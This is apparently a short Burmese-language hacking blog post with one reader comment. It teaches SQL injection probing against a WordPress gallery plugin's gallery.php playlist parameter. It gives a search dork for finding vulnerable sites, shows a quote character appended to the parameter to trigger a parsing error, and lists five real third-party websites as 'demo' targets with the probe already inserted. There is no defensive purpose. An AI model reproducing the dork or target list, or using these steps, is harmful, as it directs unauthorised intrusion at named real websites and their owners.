ဒါေလးကေတာ့ WordPress SQL injection ေလးပါဘဲ..
ဘာမွေတာ့မခက္လွပါဘူး.....
Drok : inurl:/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=
ေဒါ့ကို သုံးလုိက္ပါ... ျပီး၇င္ေတာ့ မိမိ အဆင္ေျပမယ္ထင္တဲ့ လင့္ကို ကလစ္ေပးလိုက္ပါ..
ျပီးရင္ေတာ့ Sql injection basic code " ' " ေလးကို ထည့္လုိက္ပါမယ္..
ဥပမာ -
http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist
ဘဲ ဆုိပါေတာ့ဗ်ာ... အဲ့လင့္ ေနာက္က /gallery.php?playlist=my-playlist ဆုိတာေလးေနာက္မွာေပ့ါ..
" ' " ေလး ထည့္ေပးရပါမယ္..
http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist'
လုိေလးျဖစ္သြားမယ္သြားၾကည့္လုိက္ပါ..
XML Parsing Error: syntax error
Location: http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist%27
Line Number 1, Column 1:
စမ္းဖုိ ့ေအာက္ကလင့္ေတြထပ္ေပးလုိက္ပါတယ္..
Demo : .>
http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist%27
http://kiwirootsmusic.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=recordings%27
http://www.buritacaworldbeat.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=burisongs%27
http://www.unclebobsrockshop.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=songs%27
http://headingtoawedding.ca/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=homepage%27





how to inject ?
ReplyDelete